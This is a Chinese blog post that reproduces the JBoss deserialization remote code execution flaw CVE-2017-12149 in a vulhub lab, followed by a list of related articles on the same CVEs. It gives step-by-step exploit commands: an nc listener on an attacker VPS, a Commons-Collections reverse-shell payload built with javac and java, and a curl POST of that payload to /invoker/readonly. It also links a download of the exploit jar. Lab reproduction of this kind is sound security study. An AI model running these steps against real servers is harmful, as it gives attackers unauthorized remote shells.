漏洞复现系列--JBOSS反序列化命令执行CVE-2017-12149

最新推荐文章于 2024-06-26 08:00:00 发布
最新推荐文章于 2024-06-26 08:00:00 发布
阅读量339 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40007043/article/details/105996872
版权

一、漏洞影响范围
漏洞影响5.x和6.x版本的JBOSSAS

二、复现过程
1.1.1.1 公网vps,用来接收反弹的shell
2.2.2.2 被攻击的jboss服务器

1、复现环境用的vulhub,直接docker构建下就可以
在这里插入图片描述

cd CVE-2017-12149
docker compose up -d

2、docker构建好以后,启动docker
在这里插入图片描述

docker start 44a1db984d24

3、访问对应的端口,页面如下
在这里插入图片描述
4、先在自己的公网vps上开启监听

nc -lvp 6666

在这里插入图片描述
5、获取jar包放到攻击机上
https://pan.baidu.com/s/1AB6N1x4Sq3GYVgyFGZAhoQ
提取码:ga4a

在这里插入图片描述

6、执行如下命令,生成ReverseShellCommonsCollectionsHashMap.ser

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 1.1.1.1:6666 #你之前监听的地址及端口,用来接受shell

7、利用curl访问发起攻击

curl http://2.2.2.2:8080/invoker/readonly  --data-binary @ReverseShellCommonsCollectionsHashMap.ser

可以看到之前监听的vps上接收到了shell
在这里插入图片描述

梦之履行地
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2412
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
Jboss多个远程命令执行漏洞CVE-2017-12149CVE-2015-7501、CVE-2017-7504)
最新发布
qq_68163788的博客
06-26 1154
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 5770
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
JbossCVE-2017-12149反序列化命令执行漏洞
weixin_51151498的博客
12-11 2245
JbossCVE-2017-12149反序列化命令执行漏洞
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)
网络安全领域___专研者.
11-28 1616
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反序列化是将之前序列化的对象状态恢复到可操作的Java对象的过程。然而,如果这个过程没有...
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149Jboss反序列化漏洞利用工具,CVE-2017-12149
JBoss漏洞 - CVE-2017-12149
HAKUNAMATATATTA的博客
12-14 1654
JBOSSApplication Server 反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
CVE-2017-7504漏洞复现
Foreverlove112的博客
10-01 600
CVE-2017-7504漏洞复现
Jboss反序列化远程代码执行漏洞CVE-2017-12149
weixin_46411728的博客
08-28 1724
Jboss反序列化远程代码执行漏洞CVE-2017-12149
vulhubjboss(CVE-2017-7504)
weixin_56306210的博客
05-07 501
vulhubjboss(CVE-2017-7504)
[Vulfocus解题系列] jboss 反序列化CVE-2017-7504)
00勇士王子的博客
07-11 1086
漏洞介绍 名称: jboss 反序列化CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
CVE-2017-12149
qq_22002773的博客
09-08 272
CVE-2017-12149
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-12149
网络安全领域___专研者.
11-28 681
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
jboss/CVE-2017-7504
不知名白帽的博客
06-23 2136
jboss/CVE-2017-7504漏洞复现
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149JBOSS应用服务器中的一个远程代码执行漏洞JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的HTTP Invoker组件没有正确地验证反序列化的对象。攻击者可以通过HTTP请求发送一个恶意的序列化对象,该对象会被反序列化并在服务器上执行代码。攻击者可以利用这个漏洞完全接管服务器,执行任意代码,包括修改、删除、添加文件等操作。 该漏洞影响JBoss Application Server 5.x、6.x和7.x版本。Red Hat已经发布了相关的安全公告和补丁,建议用户及时更新。 总之,CVE-2017-12149漏洞的危害非常严重,对于使用JBOSS应用服务器的用户来说,需要及时关注并采取措施进行修复和防范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值